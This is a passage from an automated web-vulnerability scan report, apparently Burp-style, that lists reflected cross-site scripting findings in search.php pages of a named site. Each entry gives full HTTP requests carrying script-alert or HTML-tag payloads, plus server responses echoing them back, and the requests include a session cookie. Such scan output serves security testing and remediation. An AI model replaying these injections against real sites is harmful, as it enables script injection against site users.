X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/9/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&f966f<script>alert(1)</script>8a8c0dec2d3=1 was not found on this server.</p>
...[SNIP]...

2.3790. http://www.resellerbase.com/detail/9/themes/kosmos/images/rating/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/9/themes/kosmos/images/rating/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload cadb5<a>c5642c409c6 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/9/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2cadb5<a>c5642c409c6 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/9/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/9/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2cadb5<a>c5642c409c6 was not found on this server.</p>
...[SNIP]...

2.3791. http://www.resellerbase.com/detail/9/themes/kosmos/images/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/9/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8ef1f<script>alert(1)</script>dfa22306590 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail8ef1f<script>alert(1)</script>dfa22306590/9/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/9/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail8ef1f<script>alert(1)</script>dfa22306590/9/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3792. http://www.resellerbase.com/detail/9/themes/kosmos/images/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/9/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 79249<script>alert(1)</script>68c72488d8d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/979249<script>alert(1)</script>68c72488d8d/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/9/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/979249<script>alert(1)</script>68c72488d8d/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3793. http://www.resellerbase.com/detail/9/themes/kosmos/images/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/9/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 22a2f<script>alert(1)</script>9484d733135 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/9/themes22a2f<script>alert(1)</script>9484d733135/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/9/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/9/themes22a2f<script>alert(1)</script>9484d733135/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3794. http://www.resellerbase.com/detail/9/themes/kosmos/images/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/9/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 3ec29<script>alert(1)</script>42703acc04a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/9/themes/kosmos3ec29<script>alert(1)</script>42703acc04a/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/9/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/9/themes/kosmos3ec29<script>alert(1)</script>42703acc04a/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3795. http://www.resellerbase.com/detail/9/themes/kosmos/images/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/9/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 1f36f<script>alert(1)</script>ba928904c62 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/9/themes/kosmos/images1f36f<script>alert(1)</script>ba928904c62/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/9/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/9/themes/kosmos/images1f36f<script>alert(1)</script>ba928904c62/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3796. http://www.resellerbase.com/detail/9/themes/kosmos/images/search.php [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/9/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 92720<script>alert(1)</script>70c3f479b7c was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/9/themes/kosmos/images/search.php92720<script>alert(1)</script>70c3f479b7c?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/9/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/9/themes/kosmos/images/search.php92720<script>alert(1)</script>70c3f479b7c?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3797. http://www.resellerbase.com/detail/9/themes/kosmos/images/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/9/themes/kosmos/images/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 509bc<a>80a5dd6fdf3 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/9/themes/kosmos/images/search.php?keyword=search...&Submit3=Search509bc<a>80a5dd6fdf3&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/9/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/9/themes/kosmos/images/search.php?keyword=search...&Submit3=Search509bc<a>80a5dd6fdf3&opt=2 was not found on this server.</p>
...[SNIP]...

2.3798. http://www.resellerbase.com/detail/9/themes/kosmos/images/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/9/themes/kosmos/images/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 83abc<a>ef0d2e8c4b1 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/9/themes/kosmos/images/search.php?keyword=search...83abc<a>ef0d2e8c4b1&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/9/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/9/themes/kosmos/images/search.php?keyword=search...83abc<a>ef0d2e8c4b1&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3799. http://www.resellerbase.com/detail/9/themes/kosmos/images/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/9/themes/kosmos/images/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 357ea<script>alert(1)</script>df0fba776b2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/9/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&357ea<script>alert(1)</script>df0fba776b2=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/9/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/9/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&357ea<script>alert(1)</script>df0fba776b2=1 was not found on this server.</p>
...[SNIP]...

2.3800. http://www.resellerbase.com/detail/9/themes/kosmos/images/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/9/themes/kosmos/images/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 82cec<a>f4c2e381a61 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/9/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=282cec<a>f4c2e381a61 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/9/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/9/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=282cec<a>f4c2e381a61 was not found on this server.</p>
...[SNIP]...

2.3801. http://www.resellerbase.com/detail/9/themes/kosmos/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/9/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 6252d<script>alert(1)</script>fb3b8e4327b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail6252d<script>alert(1)</script>fb3b8e4327b/9/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/9/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail6252d<script>alert(1)</script>fb3b8e4327b/9/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3802. http://www.resellerbase.com/detail/9/themes/kosmos/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/9/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f864c<script>alert(1)</script>733785b811b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/9f864c<script>alert(1)</script>733785b811b/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/9/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/9f864c<script>alert(1)</script>733785b811b/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3803. http://www.resellerbase.com/detail/9/themes/kosmos/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/9/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 8b1e0<script>alert(1)</script>1e41ace7abf was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/9/themes8b1e0<script>alert(1)</script>1e41ace7abf/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/9/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/9/themes8b1e0<script>alert(1)</script>1e41ace7abf/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3804. http://www.resellerbase.com/detail/9/themes/kosmos/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/9/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 42be4<script>alert(1)</script>d5c488018c5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/9/themes/kosmos42be4<script>alert(1)</script>d5c488018c5/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/9/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/9/themes/kosmos42be4<script>alert(1)</script>d5c488018c5/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3805. http://www.resellerbase.com/detail/9/themes/kosmos/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/9/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 92a75<script>alert(1)</script>31b69396296 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/9/themes/kosmos/search.php92a75<script>alert(1)</script>31b69396296?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/9/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/9/themes/kosmos/search.php92a75<script>alert(1)</script>31b69396296?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3806. http://www.resellerbase.com/detail/9/themes/kosmos/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/9/themes/kosmos/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 7df22<a>4badcdeb0fa was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/9/themes/kosmos/search.php?keyword=search...&Submit3=Search7df22<a>4badcdeb0fa&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/9/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/9/themes/kosmos/search.php?keyword=search...&Submit3=Search7df22<a>4badcdeb0fa&opt=2 was not found on this server.</p>
...[SNIP]...

2.3807. http://www.resellerbase.com/detail/9/themes/kosmos/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/9/themes/kosmos/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 3bda4<a>4487a87f624 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/9/themes/kosmos/search.php?keyword=search...3bda4<a>4487a87f624&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
